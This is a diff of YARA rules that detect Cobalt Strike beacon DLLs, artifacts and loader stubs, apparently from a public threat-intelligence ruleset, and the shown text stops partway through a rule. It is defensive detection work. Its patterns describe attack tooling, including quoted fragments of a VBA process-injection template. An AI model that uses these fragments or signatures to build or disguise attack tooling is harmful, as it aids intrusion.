"https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1150-L1189" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "9ecf56e9099811c461d592c325c65c4f9f27d947cbdf3b8ef8a98a43e583aecb" - logic_hash = "d76e3601f61ae164a8df9048d59d15cd6913e64adb93132244e83f40bf67d86a" + hash = "934134ab0ee65ec76ae98a9bb9ad0e9571d80f4bf1eb3491d58bacf06d42dc8d" + logic_hash = "5cd69554edb91956f4ec4c3c5e55f4cd9c3665656c318220ba3a270c0bb0a690" score = 75 quality = 85 tags = "" strings: - $deleteFileCOM = { - 48 8B [5] - 45 33 ?? - 48 8B ?? - FF 90 90 00 00 00 - 85 C0 - 75 ?? - 48 8B [5] - 48 8B ?? - FF 92 A8 00 00 00 - 85 C0 - } - $copyFileCOM = { - 48 8B [5] - 4C 8B [5] - 48 8B [5] - 48 8B ?? - 4C 8B ?? - 48 89 [3] - FF 90 80 00 00 00 - 85 C0 - 0F 85 [4] - 48 8B [5] - 48 8B 11 - FF 92 A8 00 00 00 - } + $version_sig = { 8B D3 48 8B CF E8 38 70 00 00 E9 FD FA FF FF + 41 B8 01 00 00 00 8B D3 48 8B CF E8 3F 4D 00 00 + 48 8B 5C 24 30 48 83 C4 20 5F } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Xor_Bin_V2_X_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_6 { meta: - description = "Cobalt Strike's resource/xor.bin signature for version 2.x through 4.x" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.6" author = "gssincla@google.com" - id = "1754746c-3a42-5f7d-808a-ba2e1c0a270e" + id = "9651a1ca-d8ea-5b0b-bcba-a850c2e07791" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__32bit_v2_x_to_4_x.yara#L17-L36" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1191-L1233" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "211ccc5d28b480760ec997ed88ab2fbc5c19420a3d34c1df7991e65642638a6f" - logic_hash = "ad662a263ede6c3ba964baf8abe4848ed1e994f2c236d4315cb60c1d51442620" + hash = "92b0a4aec6a493bcb1b72ce04dd477fd1af5effa0b88a9d8283f26266bb019a1" + logic_hash = "d6aff186a01386992f004cb775d280f9b6e7e16d7ecee662d61e3485b0bc088b" score = 75 quality = 85 tags = "" strings: - $stub52 = {fc e8 ?? ?? ?? ?? [1-32] eb 27 5? 8b ?? 83 c? ?4 8b ?? 31 ?? 83 c? ?4 5? 8b ?? 31 ?? 89 ?? 31 ?? 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb ea 5? ff e? e8 d4 ff ff ff} - $stub56 = {fc e8 ?? ?? ?? ?? [1-32] eb 2b 5d 8b ?? ?? 83 c5 ?4 8b ?? ?? 31 ?? 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e8 5? ff e? e8 d? ff ff ff} + $version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 27 + 0F 87 47 03 00 00 0F 84 30 03 00 00 83 F9 14 + 0F 87 A4 01 00 00 0F 84 7A 01 00 00 83 F9 0C + 0F 87 C8 00 00 00 0F 84 B3 00 00 00 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: - any of them + all of them } -rule GCTI_Cobaltstrike__Resources_Browserpivot_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_Dll_V4_0_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_7 { meta: - description = "Cobalt Strike's resources/browserpivot.bin from v1.48 to v3.14 and sleeve/browserpivot.dll from v4.0 to at least v4.4" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.7" author = "gssincla@google.com" - id = "55086544-6684-526b-914f-505a562be458" + id = "27fad98a-2882-5c52-af6e-c7dcf5559624" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_Dll_v4_0_to_v4_x.yara#L17-L60" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1235-L1274" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "12af9f5a7e9bfc49c82a33d38437e2f3f601639afbcdc9be264d3a8d84fd5539" - logic_hash = "416554d31c105fd96aeaef508847efe2889590909c8d0025e3862e5b24078131" + hash = "81296a65a24c0f6f22208b0d29e7bb803569746ce562e2fa0d623183a8bcca60" + logic_hash = "89499e01acd607b2fbcdd134c74ca4a901c00c7c9cf70dd241cc538c1c0d083a" score = 75 quality = 85 tags = "" strings: - $socket_recv = { - FF [1-5] - 83 ?? FF - 74 ?? - 85 C0 - (74 | 76) ?? - 03 ?? - 83 ?? 02 - 72 ?? - 80 ?? 3E FF 0A - 75 ?? - 80 ?? 3E FE 0D - } - $fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]" + $version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 28 + 0F 87 7F 03 00 00 0F 84 67 03 00 00 83 F9 15 + 0F 87 DB 01 00 00 0F 84 BF 01 00 00 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Bypassuactoken_Dll_V3_11_To_V3_14 +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_8 { meta: - description = "Cobalt Strike's resources/bypassuactoken.dll from v3.11 to v3.14 (32-bit version)" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.8" author = "gssincla@google.com" - id = "b9f25fa5-bd1d-5ba0-9b1d-bb97e1dbf76b" + id = "89809d81-9a8b-5cf3-a251-689bf52e98e0" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_Dll_v3_11_to_v3_14.yara#L17-L151" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1276-L1310" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "df1c7256dfd78506e38c64c54c0645b6a56fc56b2ffad8c553b0f770c5683070" - logic_hash = "fe0780b7f4c16b55cfa00ea7de4da8ce349ec8a72de763b72e816ebc8e934b6d" + hash = "547d44669dba97a32cb9e95cfb8d3cd278e00599e6a11080df1a9d09226f33ae" + logic_hash = "8845b71ce4401fd194eb88f04dbf1f313af8b4853da004e63261ca3158fcb1d4" score = 75 quality = 85 tags = "" strings: - $isHighIntegrityProcess = { - 5? - 5? - 5? - 8B ?? - 6A 19 - 5? - FF 15 [4] - 85 C0 - 75 ?? - FF 15 [4] - 83 ?? 7A - 75 ?? - FF [2] - 5? - FF 15 [4] - 8B ?? - 8D [2] - 5? - FF [2] - 5? - 6A 19 - 5? - FF 15 [4] - 85 C0 - 74 ?? - FF ?? - FF 15 [4] - 8A ?? - FE C8 - 0F B6 C0 - 5? - FF ?? - FF 15 [4] - B? 01 00 00 00 - 5? - 81 ?? 00 30 00 00 - } - $executeTaskmgr = { - 6A 3C - 8D ?? C4 - 8B ?? - 6A 00 - 5? - 8B ?? - E8 [4] - 83 C4 0C - C7 [2] 3C 00 00 00 - 8D [2] - C7 [2] 40 00 00 00 - C7 [6] - C7 [2] 00 00 00 00 - 5? - C7 [2] 00 00 00 00 - C7 [6] - C7 [2] 00 00 00 00 - FF 15 [4] - FF 75 FC - } + $version_sig = { 8B D3 48 8B CF E8 7A 52 00 00 EB 0D 45 33 C0 8B D3 48 8B CF + E8 8F 55 00 00 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Artifact64_V1_49_V2_X_V3_0_V3_3_Thru_V3_14 +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_11 { meta: - description = "Cobalt Strike's resources/artifact64{.dll,.exe,big.exe,big.dll,bigsvc.exe,big.x64.dll} and resources/rtifactuac(alt)64.dll signature for versions v1.49, v2.x, v3.0, and v3.3 through v3.14" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.11 (two subversions)" author = "gssincla@google.com" - id = "67902782-500e-5a89-8b2a-59ee21bcba3e" + id = "bf0c7661-2583-5fca-beb5-abb2b50c860d" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L17-L54" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1312-L1366" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "9ec57d306764517b5956b49d34a3a87d4a6b26a2bb3d0fdb993d055e0cc9920d" - logic_hash = "289950e89fc743ff4a1b7dcb91c561c7d829cfe3ade1c2f1a09f2e9701cce461" + hash = "64007e104dddb6b5d5153399d850f1e1f1720d222bed19a26d0b1c500a675b1a" + logic_hash = "9c34b23b659463a0ab92949031a9b3246aa95256d1548b2f0ad53fe3d379997d" score = 75 quality = 85 tags = "" + rs2 = "815f313e0835e7fdf4a6d93f2774cf642012fd21ce870c48ff489555012e0047" strings: - $a = { 8B [2] 48 98 48 [2] 48 [3] 8B [2] 48 98 48 [3] 44 [3] 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 48 98 48 [3] 0F B6 00 44 [2] 88 } + $version_sig = { 48 83 EC 20 41 8B D8 48 8B FA 83 F9 2D 0F 87 B2 03 00 00 + 0F 84 90 03 00 00 83 F9 17 0F 87 F8 01 00 00 + 0F 84 DC 01 00 00 83 F9 0E 0F 87 F9 00 00 00 + 0F 84 DD 00 00 00 FF C9 0F 84 C0 00 00 00 83 E9 02 + 0F 84 A6 00 00 00 FF C9 } + $decoder = { + 80 34 28 ?? + 48 FF C0 + 48 3D 00 10 00 00 + 7C F1 + } condition: - $a + all of them } -rule GCTI_Cobaltstrike_Resources_Artifact64_V3_1_V3_2_V3_14_And_V4_0 +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_12 { meta: - description = "Cobalt Strike's resources/artifact64{svcbig.exe,.dll,big.dll,svc.exe} and resources/artifactuac(big)64.dll signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.12" author = "gssincla@google.com" - id = "c9e9b8e0-16fe-5abc-b1fe-0e3e586f6db6" + id = "6eeae9f4-96e0-5a98-a8dc-779c916cd968" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L56-L84" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1368-L1404" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "2e7a39bd6ac270f8f548855b97c4cef2c2ce7f54c54dd4d1aa0efabeecf3ba90" - logic_hash = "e5af04baa1d18d5a2a2c005b40bf93fe6a7b2d7116dfcf3c5b3fa36657448eb9" + hash = "8a28b7a7e32ace2c52c582d0076939d4f10f41f4e5fa82551e7cc8bdbcd77ebc" + logic_hash = "7457b20f2a7dc7e8c3317cedbcfccae30ecc8dc164188c0321f9485fdfab0f6e" score = 75 quality = 85 tags = "" strings: - $decoderFunction = { 31 ?? EB 0F 41 [2] 03 47 [3] 44 [3] 48 [2] 39 ?? 41 [2] 7C EA 4C [6] E9 } + $version_sig = { 8B D3 48 8B CF E8 F8 2E 00 00 EB 16 8B D3 48 8B CF + E8 00 5C 00 00 EB 0A 8B D3 48 8B CF E8 64 4F 00 00 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: - $decoderFunction + all of them } -rule GCTI_Cobaltstrike_Resources_Artifact64_V3_14_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_13 { meta: - description = "Cobalt Strike's resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.13" author = "gssincla@google.com" - id = "1c7731d3-429b-57aa-9c17-8de7d0841b1e" + id = "202eb8ea-7afb-515b-9306-67514abf5e55" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact64_v1_49_to_v4_x.yara#L86-L128" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1407-L1440" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44" - logic_hash = "af8ba6ba62bf1179510b0940e60f893f61b3ba10c81001dd90fe4c3521e56a37" + hash = "945e10dcd57ba23763481981c6035e0d0427f1d3ba71e75decd94b93f050538e" + logic_hash = "81571a6c30802430d0df9980e005736d58464bde98c0889b48bf8d0c7e88d247" score = 75 quality = 85 tags = "" strings: - $fmtBuilder = { - 41 ?? 5C 00 00 00 - C7 [3] 5C 00 00 00 - C7 [3] 65 00 00 00 - C7 [3] 70 00 00 00 - C7 [3] 69 00 00 00 - C7 [3] 70 00 00 00 - C7 [3] 5C 00 00 00 - C7 [3] 2E 00 00 00 - 89 [3] - 48 [6] - E8 - } - $fmtString = "%c%c%c%c%c%c%c%c%cMSSE-%d-server" + $version_sig = { 48 8D 0D 01 5B FF FF 48 83 C4 28 E9 A8 54 FF FF 8B D0 + 49 8B CA E8 22 55 FF FF } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Template_X86_Vba_V3_8_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_14 { meta: - description = "Cobalt Strike's resources/template.x86.vba signature for versions v3.8 to v4.x" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.14" author = "gssincla@google.com" - id = "11c7758e-93b2-5fe3-873d-b98de579d2b4" + id = "d69171e3-86f4-5187-8874-5eee2045f746" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x86_Vba_v3_8_to_v4_x.yara#L17-L37" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1442-L1477" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142" - logic_hash = "7114515477d82651806eccef34f599f6ffd4614f987dee29417ac6ef7a1a1c38" + hash = "297a8658aaa4a76599a7b79cb0da5b8aa573dd26c9e2c8f071e591200cf30c93" + logic_hash = "87cf465154d4294eeda9cf99c6c160da80cfa8a65244bc083737c0c87163431d" score = 75 quality = 85 tags = "" + rs2 = "39b9040e3dcd1421a36e02df78fe031cbdd2fb1a9083260b8aedea7c2bc406bf" strings: - $createstuff = "Function CreateStuff Lib \"kernel32\" Alias \"CreateRemoteThread\"" nocase - $allocstuff = "Function AllocStuff Lib \"kernel32\" Alias \"VirtualAllocEx\"" nocase - $writestuff = "Function WriteStuff Lib \"kernel32\" Alias \"WriteProcessMemory\"" nocase - $runstuff = "Function RunStuff Lib \"kernel32\" Alias \"CreateProcessA\"" nocase - $vars = "Dim rwxpage As Long" nocase - $res = "RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)" - $rwxpage = "AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)" + $version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 B1 1F 00 00 8B D0 49 8B CA + 48 83 C4 28 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: - all of them and @vars[1]<@res[1] and @allocstuff[1]<@rwxpage[1] + all of them } -rule GCTI_Cobaltstrike_Resources_Xor_Bin__64Bit_V3_12_To_V4_X +rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_X86_V4_0_Suspected { meta: - description = "Cobalt Strike's resource/xor64.bin signature for version 3.12 through 4.x" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.0 (suspected, not confirmed)" author = "gssincla@google.com" - id = "5bb465ee-3bbd-5bfe-8b63-1f243de217bc" + id = "28a735c4-87d1-5e14-9379-46a6fd0cdd2a" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__64bit_v3_12_to_4_x.yara#L17-L38" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1480-L1515" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "01dba8783768093b9a34a1ea2a20f72f29fd9f43183f3719873df5827a04b744" - logic_hash = "aabaad09408ae292a0bbc678c334f9f54364b4f6b882846072c303bf826fc2da" + hash = "55aa2b534fcedc92bb3da54827d0daaa23ece0f02a10eb08f5b5247caaa63a73" + logic_hash = "0dbf6a75dc74f4c2a7604072a01e2dbaaee15f5e57c765f24138d85c248fb305" score = 75 quality = 85 tags = "" strings: - $stub58 = {fc e8 ?? ?? ?? ?? [1-32] eb 33 5? 8b ?? 00 4? 83 ?? ?4 8b ?? 00 31 ?? 4? 83 ?? ?4 5? 8b ?? 00 31 ?? 89 ?? 00 31 ?? 4? 83 ?? ?4 83 ?? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? fc 4? 83 ?? f0 ff} - $stub59 = {fc e8 ?? ?? ?? ?? [1-32] eb 2e 5? 8b ?? 48 83 c? ?4 8b ?? 31 ?? 48 83 c? ?4 5? 8b ?? 31 ?? 89 ?? 31 ?? 48 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e9 5? 48 83 ec ?8 ff e? e8 cd ff ff ff} - $stub63 = {fc e8 ?? ?? ?? ?? [1-32] eb 32 5d 8b ?? ?? 48 83 c5 ?4 8b ?? ?? 31 ?? 48 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 48 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? 48 83 ec ?8 ff e? e8 c9 ff ff ff} + $version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 D1 B3 FF FF + 8B D0 49 8B CA 48 83 C4 28 E9 AF F5 FF FF 45 33 C0 + 4C 8D 0D 8D 70 FF FF 8B D0 49 8B CA E8 9B B0 FF FF } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: - any of them + all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_44 +rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_1_And_V_4_2 { meta: - description = "Cobalt Strike's resources/beacon.dll Version 1.44" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.1 and 4.2" author = "gssincla@google.com" - id = "935ee27f-ce1b-5491-b4a3-cb78f199ab1b" + id = "dc320d17-98fc-5df3-ba05-4d134129317e" date = "2022-11-18" modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L17-L49" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1517-L1553" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "75102e8041c58768477f5f982500da7e03498643b6ece86194f4b3396215f9c2" - logic_hash = "ebed8b6dc0b929164b1aa25b491b9d2fbb61d380a8b1268df7d424afe90f613d" + hash = "29ec171300e8d2dad2e1ca2b77912caf0d5f9d1b633a81bb6534acb20a1574b2" + logic_hash = "9b262ec18f79ab5ae63ad26d3685af088b5feb2d66de6ad3ba584cafbe2ee221" score = 75 quality = 85 tags = "" strings: - $version_sig = { 0F B7 D2 4A 53 8B D9 83 FA 04 77 36 FF 24 } - $decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 } + $version_sig = { 83 F9 34 0F 87 8E 03 00 00 0F 84 7A 03 00 00 83 F9 1C 0F 87 E6 01 00 00 + 0F 84 D7 01 00 00 83 F9 0E 0F 87 E9 00 00 00 0F 84 CE 00 00 00 FF C9 + 0F 84 B8 00 00 00 83 E9 02 0F 84 9F 00 00 00 FF C9 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_45 +rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_3 { meta: - description = "Cobalt Strike's resources/beacon.dll Version 1.45" + description = "Cobalt Strike's sleeve/beacon.x64.dll Version 4.3" author = "gssincla@google.com" - id = "04d4d0ee-f1ee-5888-8108-ca55243c770a" + id = "572616c7-d1ec-5aa1-b142-4f2edf73737f" date = "2022-11-18" modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L51-L84" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1555-L1590" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "1a92b2024320f581232f2ba1e9a11bef082d5e9723429b3e4febb149458d1bb1" - logic_hash = "b1472907e0fe0cb26219c268f23483681cc076dab96c1b0f2f0ee472ad319b4f" + hash = "3ac9c3525caa29981775bddec43d686c0e855271f23731c376ba48761c27fa3d" + logic_hash = "0c8934e997583339145749a3167ac010d8c77b2ed878d2c999de68ec2a98101d" score = 75 quality = 85 tags = "" strings: - $version_sig = { 51 0F B7 D2 4A 53 56 83 FA 08 77 6B FF 24 } - $decode = { B1 ?? 30 88 [4] 40 3D 28 01 00 00 7C F2 } + $version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 D3 88 FF FF + 4C 8D 05 84 6E FF FF 8B D0 49 8B CA 48 83 C4 28 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_46 +rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_4_V_4_5_And_V4_6 { meta: - description = "Cobalt Strike's resources/beacon.dll Version 1.46" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.4 through at least 4.6" author = "gssincla@google.com" - id = "79715042-1963-5e48-8b64-7d915da58d84" + id = "79b6bfd4-1e45-5bd9-ac5c-19eb176ce698" date = "2022-11-18" modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L86-L115" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1593-L1628" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "44e34f4024878024d4804246f57a2b819020c88ba7de160415be38cd6b5e2f76" - logic_hash = "1a5c63c8b5527c0442830a73ded8458cf82a9d8ecb9b31e9a02c10b27ed6195e" + hash = "3280fec57b7ca94fd2bdb5a4ea1c7e648f565ac077152c5a81469030ccf6ab44" + logic_hash = "be0bbf58a176f8089924b3ce58268d906f49dde51d863524971e46f4bada43a3" score = 75 quality = 85 tags = "" strings: - $version_sig = { 8B F2 83 F9 0C 0F 87 8E 00 00 00 FF 24 } - $decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 } + $version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 83 88 FF FF + 4C 8D 05 A4 6D FF FF 8B D0 49 8B CA 48 83 C4 28 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_47 +rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_5_Variant { meta: - description = "Cobalt Strike's resources/beacon.dll Version 1.47" + description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.5 (variant)" author = "gssincla@google.com" - id = "ac2249a9-210c-581f-8dd1-7619356dca7d" + id = "45715da9-8f16-5304-b216-1ca36c508c77" date = "2022-11-18" modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L117-L144" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1630-L1665" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "8ff6dc80581804391183303bb39fca2a5aba5fe13d81886ab21dbd183d536c8d" - logic_hash = 